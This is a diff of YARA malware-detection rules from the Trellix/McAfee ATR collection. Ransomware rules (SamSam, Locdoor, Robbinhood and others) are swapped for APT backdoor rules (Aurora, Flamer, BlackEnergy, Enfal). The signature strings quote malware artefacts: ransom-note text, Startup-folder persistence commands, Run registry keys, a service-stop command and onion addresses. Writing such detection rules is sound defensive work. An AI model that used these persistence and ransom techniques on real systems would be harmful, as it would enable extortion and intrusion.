-		id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb"
-		date = "2020-09-25"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_mountlocker.yar#L1-L32"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0"
-		score = 75
-		quality = 64
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/MountLocker"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-		hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273"
-		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
-
-	strings:
-		$s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44}
-		$s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e}
-		$s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( $s1 and $s2 ) or ( $s1 and $s3 ) or $s1
-}
-rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect the Termite Ransomware"
-		author = "McAfee ATR Team"
-		id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca"
-		date = "2018-08-28"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_termite.yar#L1-L32"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133"
-		logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968"
-		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Termite"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii
-		$s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii
-		$s5 = "C:\\Windows\\Termite.exe" fullword ascii
-		$s6 = "\\Shell\\Open\\Command\\" fullword ascii
-		$s7 = "t314.520@qq.com" fullword ascii
-		$s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB ) and all of them
-}
-rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect the Evilquest/ThiefQuest malware"
-		author = "McAfee ATR Team"
-		id = "09b074f7-6899-574d-a7d6-4414509aaa78"
-		date = "2020-07-09"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_thiefquest.yar#L1-L46"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b"
-		logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25"
-		score = 75
-		quality = 68
-		tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "keylogger, backdoor, ransomware"
-		actor_type = "Cybercrime"
-		malware_family = "Ransom:OSX/ThiefQuest"
-
-	strings:
-		$pattern_0 = { 01c1 48 83c102 48 }
-		$pattern_1 = { 8c1471 80c1c1 98 1c8c }
-		$pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 }
-		$pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 }
-		$pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 }
-		$pattern_5 = { d898ab5c757b 2f f26f 5d }
-		$pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 }
-		$pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 }
-		$pattern_8 = { 01c1 48 83c101 48 }
-		$pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 }
-		$pattern_10 = { fd d7 43bd18fd6f06 7937 fa }
-		$pattern_11 = { 01c2 48 83c201 bf01000000 }
-		$pattern_12 = { d89825ed4469 29f1 5c e12d }
-		$pattern_13 = { d8992062f7f9 73ff 90 085fc6 }
-		$pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? }
-		$pattern_15 = { 01c1 41 89c8 44 }
-		$pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 }
-		$pattern_17 = { 01c1 48 8b75a8 48 }
-		$pattern_18 = { 0000 48 8945f8 e9???????? }
-		$pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 }
-		$pattern_20 = { 01c2 48 83c203 bf01000000 }
-		$pattern_21 = { 4a7888 ab 23e7 cf 11f3 }
-		$pattern_22 = { d8982fbf222d 49 92 1d25b42bba }
-		$pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 }
-
-	condition:
-		7 of them and filesize < 124322606
-}
-rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect the Shrug Ransomware"
-		author = "McAfee ATR Team"
-		id = "34e59296-db7c-551b-8d48-ffea20f2b4bb"
-		date = "2018-07-12"
-		modified = "2020-10-12"
-		reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_shrug2.yar#L1-L30"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59"
-		logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b"
-		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
+		tags = "ROOTKIT, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Shrug"
+		malware_type = "rootkit"
+		malware_family = "Rootkit:W32/Hikit"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii
-		$s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide
-		$s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide
-		$s4 = "C:\\Users\\" fullword wide
-		$s5 = "http://clients3.google.com/generate_204" fullword wide
-		$s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide
+		$pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb"
+		$pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb"
+		$pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb"
+		$pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
-rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Locdoor/DryCry"
+		description = "Aurora APT Malware 2006-2010"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "d855d7fd-a1e3-561e-906e-103752285b0f"
-		date = "2018-09-02"
+		id = "51b080b7-671b-592b-ba52-7fdd0ddf0294"
+		date = "2010-01-11"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/leotpsc/status/1036180615744376832"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_locdoor.yar#L1-L32"
+		reference = "https://en.wikipedia.org/wiki/Operation_Aurora"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_aurora.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41"
-		logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c"
+		hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364"
+		logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Locdoor"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Aurora"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii
-		$s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii
-		$s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii
-		$s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii
-		$s5 = "! Your computer's important files have been encrypted! " fullword ascii
-		$s7 = "This program is not supported on your operating system." fullword ascii
-		$s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
-		$s9 = "Please enter the password." fullword ascii
+		$pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb"
+		$pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-
-rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE
+rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "No description has been set in the source file - Trellix ARC"
-		author = "Christiaan Beek | McAfee ATR Team"
-		id = "1c7985d0-d01c-52f7-8819-e038ccc01212"
-		date = "2018-01-25"
+		description = "Rule to detect Enfal malware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "09b9667c-cf58-5438-958d-19a99fe91e32"
+		date = "2013-08-27"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L3-L52"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/enfal_pdb.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a"
+		hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf"
+		logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd"
 		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/SamSam"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Enfal"
+		actor_type = "Apt"
 		actor_group = "Unknown"
-		hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b"
 
 	strings:
-		$x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide
-		$s2 = "Could not list processes locking resource." fullword wide
-		$s3 = "samsam.del.exe" fullword ascii
-		$s4 = "samsam.exe" fullword wide
-		$s5 = "RM_UNIQUE_PROCESS" fullword ascii
-		$s6 = "KillProcessWithWait" fullword ascii
-		$s7 = "killOpenedProcessTree" fullword ascii
-		$s8 = "RM_PROCESS_INFO" fullword ascii
-		$s9 = "Exception caught in process: {0}" fullword wide
-		$s10 = "Could not begin restart session.  Unable to determine file locker." fullword wide
-		$s11 = "samsam.Properties.Resources.resources" fullword ascii
-		$s12 = "EncryptStringToBytes" fullword ascii
-		$s13 = "recursivegetfiles" fullword ascii
-		$s14 = "RSAEncryptBytes" fullword ascii
-		$s15 = "encryptFile" fullword ascii
-		$s16 = "samsam.Properties.Resources" fullword wide
-		$s17 = "TSSessionId" fullword ascii
-		$s18 = "Could not register resource." fullword wide
-		$s19 = "<recursivegetfiles>b__0" fullword ascii
-		$s20 = "create_from_resource" fullword ascii
-		$op0 = { 96 00 e0 00 29 00 0b 00 34 23 }
-		$op1 = { 96 00 12 04 f9 00 34 00 6c 2c }
-		$op2 = { 72 a5 0a 00 70 a2 06 20 94 }
+		$pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb"
+		$pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb"
+		$pdb2 = "\\Release\\ServiceDll.pdb"
+		$pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb"
+		$pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-
-rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Latest SamSA ransomware samples"
-		author = "Christiaan Beek"
-		id = "716b9282-013e-5194-8518-2fa1a4007095"
-		date = "2018-01-23"
+		description = "Rule to detect the BlackEnergy trojan"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55"
+		date = "2013-02-15"
 		modified = "2020-08-14"
-		reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L54-L105"
+		reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_blackenergy_pdb.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828"
-		logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317"
-		score = 50
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d"
+		logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9"
+		score = 75
+		quality = 70
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/SamSam"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/BlackEngergy"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide
-		$s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii
-		$s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii
-		$s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide
-		$s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii
-		$s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide
-		$s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide
-		$s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide
-		$s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide
-		$s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide
-		$s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide
-		$s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide
-		$s13 = "e3208957ad76d2f2e249276410744b29" fullword wide
-		$s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide
-		$s15 = "81ee346489c272f456f2b17d96365c34" fullword wide
-		$s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide
-		$s17 = "6943e17a989f11af750ea0441a713b89" fullword wide
-		$s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide
-		$s19 = "90928fd1250435589cc0150849bc0cff" fullword wide
-		$s20 = "67da807268764a7badc4904df351932e" fullword wide
-		$op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 }
-		$op1 = { 01 00 b2 04 00 00 01 00 84 }
-		$op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 }
+		$s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide
+		$s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide
+		$s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide
+		$s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide
+		$s5 = "This version of Internet Explorer is not supported.  You should upgrade Internet Explorer to version %s and run setup again.  Se" wide
+		$s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide
+		$s7 = "o %s e execute a configura" fullword wide
+		$s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide
+		$s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii
+		$s10 = "BootStrap.log" fullword wide
+		$s11 = "ACDownloaderDlg" fullword ascii
+		$s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide
+		$s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide
+		$s14 = "\\Msi.dll" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 8 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the ScreenLocker Acroware"
+		description = "Rule to detect gdocupload tool used by APT1"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "76eb69eb-dfe7-5629-bf2d-d20574efd662"
-		date = "2018-08-28"
+		id = "deb20196-65e6-5dac-af0c-2f16e5926715"
+		date = "2013-02-19"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_acroware.yar#L1-L29"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_gdocupload_pdb.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae"
-		logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1"
+		hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440"
+		logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 45
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Acroware"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Gdocupload"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii
-		$s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii
-		$s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii
-		$s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii
+		$s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii
+		$s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii
+		$s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii
+		$s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii
+		$s5 = "http://docs.google.com/?auth=" fullword ascii
+		$s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii
+		$s7 = "http://docs.google.com/" fullword ascii
+		$s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Robbinhood GoLang ransowmare"
-		author = "Christiaan Beek | McAfee ATR"
-		id = "b2654d00-330e-511e-b8f1-75aa7b57d040"
-		date = "2019-05-10"
+		description = "Rule to detect Ixeshe_bled malware based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "93356eab-5bb3-5b85-acc6-9a247554aa2d"
+		date = "2012-05-30"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_RobbinHood.yar#L1-L37"
+		reference = "https://attack.mitre.org/software/S0015/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/ixeshe_bled_pdb.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e"
-		logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038"
+		hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482"
+		logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Robbinhood"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Ixeshe"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = ".enc_robbinhood" nocase
-		$s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
-		$s3 = "pub.key" nocase
-		$s4 = "main.EnableShadowFucks" nocase
-		$s5 = "main.EnableRecoveryFCK" nocase
-		$s6 = "main.EnableLogLaunders" nocase
-		$s7 = "main.EnableServiceFuck" nocase
-		$op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d }
-		$op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f }
-		$op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd }
+		$pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $s* ) ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
 }
-rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect WannaRen Ransomware"
-		author = "McAfee ATR Team"
-		id = "f4f30d12-547d-5044-a4e5-b88bf359480f"
-		date = "2020-04-25"
-		modified = "2020-10-12"
-		reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wannaren.yar#L1-L34"
+		description = "Rule to detect Flamer based on the PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd"
+		date = "2012-05-29"
+		modified = "2020-08-14"
+		reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/flamer_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d"
-		logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c"
+		hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75"
+		logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/WannaRen"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Flamer"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$sq0 = { 92 93 a91c2ea521 59 334826 }
-		$sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d }
-		$sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 }
-		$sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 }
